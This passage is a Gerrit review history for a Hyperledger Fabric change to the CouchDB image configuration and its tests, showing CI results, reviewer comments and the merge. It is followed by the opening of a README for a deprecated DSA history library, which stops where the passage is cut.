10.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 6:08:10 PM<br><strong>Message</strong>: <pre>Patch Set 10: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9177/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 6:08:22 PM<br><strong>Message</strong>: <pre>Patch Set 10: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/714/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 6:08:26 PM<br><strong>Message</strong>: <pre>Patch Set 10: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3247/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 7:17:58 PM<br><strong>Message</strong>: <pre>Patch Set 10: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/714/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9177/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3247/ : SUCCESS</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 8:11:48 PM<br><strong>Message</strong>: <pre>Patch Set 10: (1 comment)</pre><strong>Reviewer</strong>: Adnan C - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 11:23:04 PM<br><strong>Message</strong>: <pre>Uploaded patch set 11.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 11:24:13 PM<br><strong>Message</strong>: <pre>Patch Set 11: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9180/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 11:24:48 PM<br><strong>Message</strong>: <pre>Patch Set 11: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/717/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 11:25:34 PM<br><strong>Message</strong>: <pre>Patch Set 11: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3250/ (3/3)</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/3/2017, 11:30:31 PM<br><strong>Message</strong>: <pre>Patch Set 11: Code-Review+1</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/4/2017, 1:00:27 AM<br><strong>Message</strong>: <pre>Patch Set 11: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/717/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9180/ : SUCCESS https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3250/ : SUCCESS</pre><strong>Reviewer</strong>: Chris Elder - [email protected]<br><strong>Reviewed</strong>: 4/7/2017, 6:03:05 AM<br><strong>Message</strong>: <pre>Patch Set 11: Code-Review+1</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 10:58:37 AM<br><strong>Message</strong>: <pre>Uploaded patch set 12.</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 11:01:45 AM<br><strong>Message</strong>: <pre>Uploaded patch set 13.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 11:55:02 AM<br><strong>Message</strong>: <pre>Patch Set 12: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3881/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 11:55:04 AM<br><strong>Message</strong>: <pre>Patch Set 12: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9813/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 11:56:02 AM<br><strong>Message</strong>: <pre>Patch Set 12: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1348/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 12:05:11 PM<br><strong>Message</strong>: <pre>Patch Set 13: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3882/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 12:05:21 PM<br><strong>Message</strong>: <pre>Patch Set 13: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9814/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 12:05:22 PM<br><strong>Message</strong>: <pre>Patch Set 13: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1349/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 1:39:01 PM<br><strong>Message</strong>: <pre>Patch Set 12: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3881/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1348/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9813/ : SUCCESS</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 1:39:05 PM<br><strong>Message</strong>: <pre>Patch Set 13: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/3882/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1349/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9814/ : SUCCESS</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/19/2017, 2:31:24 PM<br><strong>Message</strong>: <pre>Patch Set 13: Code-Review+1</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 10:16:30 AM<br><strong>Message</strong>: <pre>Uploaded patch set 14: Commit message was updated.</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 10:18:01 AM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/4003/ (1/3)</pre><strong>Reviewer</strong>: David Enyeart - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 10:18:49 AM<br><strong>Message</strong>: <pre>Patch Set 14: Code-Review+1</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 10:24:17 AM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9935/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 10:24:19 AM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1470/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 11:34:30 AM<br><strong>Message</strong>: <pre>Patch Set 14: Verified+1 Build Successful https://jenkins.hyperledger.org/job/fabric-verify-behave-x86_64/4003/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-end-2-end-x86_64/1470/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-verify-x86_64/9935/ : SUCCESS</pre><strong>Reviewer</strong>: Jonathan Levi (HACERA) - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:36:11 PM<br><strong>Message</strong>: <pre>Patch Set 14: (1 comment)</pre><strong>Reviewer</strong>: Jonathan Levi (HACERA) - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:36:19 PM<br><strong>Message</strong>: <pre>Patch Set 14: Code-Review+2 LGTM</pre><strong>Reviewer</strong>: Christopher Ferris - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:38:11 PM<br><strong>Message</strong>: <pre>Patch Set 14: Code-Review+2</pre><strong>Reviewer</strong>: Gerrit Code Review - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:38:13 PM<br><strong>Message</strong>: <pre>Change has been successfully merged by Christopher Ferris</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:44:32 PM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-merge-x86_64/1543/ (1/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:46:18 PM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-merge-end-2-end-x86_64/231/ (2/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 12:54:13 PM<br><strong>Message</strong>: <pre>Patch Set 14: Build Started https://jenkins.hyperledger.org/job/fabric-merge-behave-x86_64/546/ (3/3)</pre><strong>Reviewer</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Reviewed</strong>: 4/20/2017, 1:39:27 PM<br><strong>Message</strong>: <pre>Patch Set 14: Build Failed https://jenkins.hyperledger.org/job/fabric-merge-x86_64/1543/ : FAILURE https://jenkins.hyperledger.org/job/fabric-merge-end-2-end-x86_64/231/ : FAILURE (skipped) https://jenkins.hyperledger.org/job/fabric-merge-behave-x86_64/546/ : FAILURE (skipped)</pre><h1>PatchSets</h1><h3>PatchSet Number: 1</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/9/2017, 9:30:20 PM<br><strong>UnmergedRevision</strong>: [4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d](https://github.com/hyperledger-gerrit-archive/fabric/commit/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/9/2017, 10:51:08 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: Gari Singh - [email protected]<br><strong>Approved</strong>: 3/17/2017, 3:25:44 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: -1<br><br><h2>Comments</h2><strong>Commenter</strong>: Jason Yellick - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L44](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L44)<br><strong>Comment</strong>: <pre>Why do we comment these viper sets out here? But the sets for the other login details are to the empty string. Maybe an explanatory comment?</pre><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L44](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L44)<br><strong>Comment</strong>: <pre>Agreed, we'll look into using the viper settings consistently.</pre><strong>Commenter</strong>: Jason Yellick - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31)<br><strong>Comment</strong>: <pre>Is the user supposed to edit the go code to set the user and password? On an unrelated note, should this be in a test package so that it is not included into the production binary?</pre><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31)<br><strong>Comment</strong>: <pre>Jason, This is only for unit test env, which for now doesn't use CouchDB with id/pw required. This comment is for ourselves in the future, if and when unit test env starts requiring CouchDB id/pw. This was a _test file, but when we started using it as common utilities for other unit tests we had to make it not end in _test, and therefore appended _export.</pre><strong>Commenter</strong>: Gari Singh - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test_export.go#L31)<br><strong>Comment</strong>: <pre>so are we going with the username:password@ip:port construct or moving to explicitly having username/password as part of the config? In either case, we'll need to look at protecting this information</pre><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [devenv/tools/couchdb#L38](https://github.com/hyperledger-gerrit-archive/fabric/blob/4aaf161bc6ef5e8de45b91d15a78ed6eafe9500d/devenv/tools/couchdb#L38)<br><strong>Comment</strong>: <pre>Adnan, please move this devenv change to a separate changeset, since it is not related to the local.ini image config updates that is the intent of this changeset.</pre></blockquote><h3>PatchSet Number: 2</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/21/2017, 2:25:35 PM<br><strong>UnmergedRevision</strong>: [03987a6578cdfcca6249cf5c33ac746ba8b5b14b](https://github.com/hyperledger-gerrit-archive/fabric/commit/03987a6578cdfcca6249cf5c33ac746ba8b5b14b)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/21/2017, 3:16:41 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: -1<br><br></blockquote><h3>PatchSet Number: 3</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/21/2017, 4:11:52 PM<br><strong>UnmergedRevision</strong>: [5d3a25366d1b5733b5eadfc0ed321b9ebf7dc1a2](https://github.com/hyperledger-gerrit-archive/fabric/commit/5d3a25366d1b5733b5eadfc0ed321b9ebf7dc1a2)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/21/2017, 4:58:46 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: -1<br><br></blockquote><h3>PatchSet Number: 4</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/21/2017, 5:51:41 PM<br><strong>UnmergedRevision</strong>: [6aef4870d743edf84475174710ad14c23bd74a7e](https://github.com/hyperledger-gerrit-archive/fabric/commit/6aef4870d743edf84475174710ad14c23bd74a7e)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/21/2017, 7:15:59 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 5</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/23/2017, 10:58:25 AM<br><strong>UnmergedRevision</strong>: [4d6a17b6ed6a4268ba607c08a7729a554c68856a](https://github.com/hyperledger-gerrit-archive/fabric/commit/4d6a17b6ed6a4268ba607c08a7729a554c68856a)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/23/2017, 12:09:16 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 6</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/23/2017, 11:01:42 AM<br><strong>UnmergedRevision</strong>: [02950ea2fb6f3d6701a5411ee31e72919e5d76b0](https://github.com/hyperledger-gerrit-archive/fabric/commit/02950ea2fb6f3d6701a5411ee31e72919e5d76b0)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/23/2017, 12:13:48 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><h2>Comments</h2><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L32](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L32)<br><strong>Comment</strong>: <pre>Initialized but never used? I think this can be removed... both of the times couchDBDef is referenced in this package, it is set immediately before the statement.</pre><strong>Commenter</strong>: Adnan C - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L32](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L32)<br><strong>Comment</strong>: <pre>Done</pre><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L53](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L53)<br><strong>Comment</strong>: <pre>Same comment.</pre><strong>Commenter</strong>: Adnan C - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L53](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L53)<br><strong>Comment</strong>: <pre>Done</pre><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [core/ledger/util/couchdb/couchdbutil_test.go#L35](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/util/couchdb/couchdbutil_test.go#L35)<br><strong>Comment</strong>: <pre>Actually this taken care of in couchdb_test.go, so we dont need this comment here, it just adds confusion.</pre><strong>Commenter</strong>: Adnan C - [email protected]<br><strong>CommentLine</strong>: [core/ledger/util/couchdb/couchdbutil_test.go#L35](https://github.com/hyperledger-gerrit-archive/fabric/blob/02950ea2fb6f3d6701a5411ee31e72919e5d76b0/core/ledger/util/couchdb/couchdbutil_test.go#L35)<br><strong>Comment</strong>: <pre>Done</pre></blockquote><h3>PatchSet Number: 7</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/23/2017, 2:41:39 PM<br><strong>UnmergedRevision</strong>: [1774e55d3de8bd8174f3c41330a614c7ec87748f](https://github.com/hyperledger-gerrit-archive/fabric/commit/1774e55d3de8bd8174f3c41330a614c7ec87748f)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/23/2017, 3:34:36 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: David Enyeart - [email protected]<br><strong>Approved</strong>: 3/23/2017, 3:20:30 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br><h2>Comments</h2><strong>Commenter</strong>: Baohua Yang - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L35](https://github.com/hyperledger-gerrit-archive/fabric/blob/1774e55d3de8bd8174f3c41330a614c7ec87748f/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L35)<br><strong>Comment</strong>: <pre>not sure if this relative path is good enough for changes and mistake protection. Maybe we could use as some variables at the head, with enough comments to indicate the final path value.</pre><strong>Commenter</strong>: Adnan C - [email protected]<br><strong>CommentLine</strong>: [core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L35](https://github.com/hyperledger-gerrit-archive/fabric/blob/1774e55d3de8bd8174f3c41330a614c7ec87748f/core/ledger/kvledger/txmgmt/statedb/statecouchdb/statecouchdb_test.go#L35)<br><strong>Comment</strong>: <pre>I will submit another changeset for this, there are couple other places that need this exact fix.</pre></blockquote><h3>PatchSet Number: 8</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 3/29/2017, 11:28:37 AM<br><strong>UnmergedRevision</strong>: [72c25897b483bcbed82b70afa5391a050975f5b7](https://github.com/hyperledger-gerrit-archive/fabric/commit/72c25897b483bcbed82b70afa5391a050975f5b7)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 3/29/2017, 3:21:32 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: David Enyeart - [email protected]<br><strong>Approved</strong>: 3/30/2017, 11:25:13 AM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 9</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 4/3/2017, 4:42:40 PM<br><strong>UnmergedRevision</strong>: [bc9ab29cff3ccadc4d762baeb501fa01864dbced](https://github.com/hyperledger-gerrit-archive/fabric/commit/bc9ab29cff3ccadc4d762baeb501fa01864dbced)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/3/2017, 5:20:59 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: -1<br><br></blockquote><h3>PatchSet Number: 10</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 4/3/2017, 6:05:35 PM<br><strong>UnmergedRevision</strong>: [884a3f3434868915eef3cf7d307eabc3e812b05f](https://github.com/hyperledger-gerrit-archive/fabric/commit/884a3f3434868915eef3cf7d307eabc3e812b05f)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/3/2017, 7:17:58 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><h2>Comments</h2><strong>Commenter</strong>: David Enyeart - [email protected]<br><strong>CommentLine</strong>: [images/couchdb/local.ini#L53](https://github.com/hyperledger-gerrit-archive/fabric/blob/884a3f3434868915eef3cf7d307eabc3e812b05f/images/couchdb/local.ini#L53)<br><strong>Comment</strong>: <pre>remove.</pre></blockquote><h3>PatchSet Number: 11</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: Adnan C - [email protected]<br><strong>Created</strong>: 4/3/2017, 11:23:04 PM<br><strong>UnmergedRevision</strong>: [dad6609e3f6dc08687135288f4cdfb3d2cb74a1a](https://github.com/hyperledger-gerrit-archive/fabric/commit/dad6609e3f6dc08687135288f4cdfb3d2cb74a1a)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/4/2017, 1:00:27 AM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: David Enyeart - [email protected]<br><strong>Approved</strong>: 4/3/2017, 11:30:31 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: Chris Elder - [email protected]<br><strong>Approved</strong>: 4/7/2017, 6:03:05 AM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 12</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: David Enyeart - [email protected]<br><strong>Created</strong>: 4/19/2017, 10:58:37 AM<br><strong>UnmergedRevision</strong>: [611e656a1f6b6f61914e3bff8c300683dc6b5d1d](https://github.com/hyperledger-gerrit-archive/fabric/commit/611e656a1f6b6f61914e3bff8c300683dc6b5d1d)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/19/2017, 1:39:01 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 13</h3><blockquote><strong>Type</strong>: REWORK<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: David Enyeart - [email protected]<br><strong>Created</strong>: 4/19/2017, 11:01:45 AM<br><strong>UnmergedRevision</strong>: [a851f7167ab2295c5247adc858ca21b34f45bb1d](https://github.com/hyperledger-gerrit-archive/fabric/commit/a851f7167ab2295c5247adc858ca21b34f45bb1d)<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/19/2017, 1:39:05 PM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: David Enyeart - [email protected]<br><strong>Approved</strong>: 4/19/2017, 2:31:24 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br></blockquote><h3>PatchSet Number: 14</h3><blockquote><strong>Type</strong>: NO_CODE_CHANGE<br><strong>Author</strong>: Adnan C - [email protected]<br><strong>Uploader</strong>: David Enyeart - [email protected]<br><strong>Created</strong>: 4/20/2017, 10:16:30 AM<br><strong>GitHubMergedRevision</strong>: [668b4c308cf7593944762e2ce0021e852face606](https://github.com/hyperledger-gerrit-archive/fabric/commit/668b4c308cf7593944762e2ce0021e852face606)<br><br><strong>Approver</strong>: Christopher Ferris - [email protected]<br><strong>Approved</strong>: 4/20/2017, 12:38:11 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br><strong>MergedBy</strong>: Christopher Ferris<br><strong>Merged</strong>: 4/20/2017, 12:38:13 PM<br><br><strong>Approver</strong>: Hyperledger Jobbuilder - [email protected]<br><strong>Approved</strong>: 4/20/2017, 11:34:30 AM<br><strong>Type</strong>: Verified<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: Jonathan Levi (HACERA) - [email protected]<br><strong>Approved</strong>: 4/20/2017, 12:36:19 PM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br><strong>Approver</strong>: David Enyeart - [email protected]<br><strong>Approved</strong>: 4/20/2017, 10:18:49 AM<br><strong>Type</strong>: Code-Review<br><strong>Value</strong>: 1<br><br><h2>Comments</h2><strong>Commenter</strong>: Jonathan Levi (HACERA) - [email protected]<br><strong>CommentLine</strong>: [/COMMIT_MSG#L24](https://github.com/hyperledger-gerrit-archive/fabric/blob/668b4c308cf7593944762e2ce0021e852face606//COMMIT_MSG#L24)<br><strong>Comment</strong>: <pre>BTW: We should have your full name, I think (or so I was told, back in the day...)</pre></blockquote>
167.359589
7,805
0.769506
kor_Hang
0.368355
bb2b411f984069734a5c0b5aecc266ee0e7ac141
13,151
md
Markdown
README.md
iot-dsa-v2/dslink-java-v2-history
8d06d44bbf49c7db5ce8adb23db870c294dfccb8
[ "Apache-2.0" ]
null
null
null
README.md
iot-dsa-v2/dslink-java-v2-history
8d06d44bbf49c7db5ce8adb23db870c294dfccb8
[ "Apache-2.0" ]
null
null
null
README.md
iot-dsa-v2/dslink-java-v2-history
8d06d44bbf49c7db5ce8adb23db870c294dfccb8
[ "Apache-2.0" ]
null
null
null
# DEPRECATED This is no longer supported. ## dslink-java-v2-history * Java - version 1.8 and up. * [Apache License 2.0](http://www.apache.org/licenses/LICENSE-2.0) ## Overview This is a library for building DSA historians using [sdk-dslink-java-v2](https://github.com/iot-dsa-v2/sdk-dslink-java-v2). An overview of DSA can be found [here](http://iot-dsa.org/get-started/how-dsa-works). This library implements a node hierarchy with functionality that should be common to most implementations. ## Overview This is a generic library for building historians. Implementation Main Nodes must subclass HistoryMainNode which is required to provide an instance of HistoryProvider. ## Link Architecture This section outlines the hierarchy of nodes defined by this link. - _Main_ - Add database nodes here. - _Database_ - Represents a database instance. - _History Group Folder_ - History groups can be organized with folders. - _History Group_ - A history group defines a collection strategy for all of it's descendant histories. - _History Folder_ - Histories can be organized with folders. - _History Watch_ - A specific path to be trended. - _Numeric History Simulator_ - Simulates a history using on a sine wave. - _Boolean History Simulator_ - Randomly simulates a 